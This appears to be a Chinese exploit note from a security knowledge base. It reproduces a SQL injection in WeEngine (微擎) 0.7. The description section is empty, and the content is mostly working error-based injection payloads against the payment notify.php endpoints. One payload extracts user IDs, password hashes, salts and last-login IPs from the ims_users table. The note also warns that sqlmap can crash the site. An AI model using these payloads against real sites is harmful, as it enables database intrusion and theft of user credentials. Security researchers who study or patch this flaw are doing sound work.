menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 微擎 0.7 sql注入漏洞 chevron_right 微擎 0.7 sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    微擎 0.7 sql注入漏洞.md
    650 B / 2021-07-15 20:13:49
        微擎 0.7 sql注入漏洞
    ====================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    微擎 0.7
    
    三、复现过程
    ------------
    
    **此洞切记不可用sqlmap直接跑,否则会造成网站瘫痪。**
    
        http://www.0-sec.org/payment/wechat/notify.php?attach[]=1'and extractvalue(1, concat(0x5c, (select user()))),'1
        http://www.0-sec.org/payment/unionpay/notify.php
        post:
        reqReserved[]=1'and extractvalue(1, concat(0x5c, (select user()))),'1
    
    ### 补充:
    
        1)AND(EXP(~(SELECT*from(select group_concat(0x7B,uid,0x23,password,0x23,salt,0x23,lastvisit,0x23,lastip,0x7D) from we77.ims_users)a))) AND (1
    
    
    links
    file_download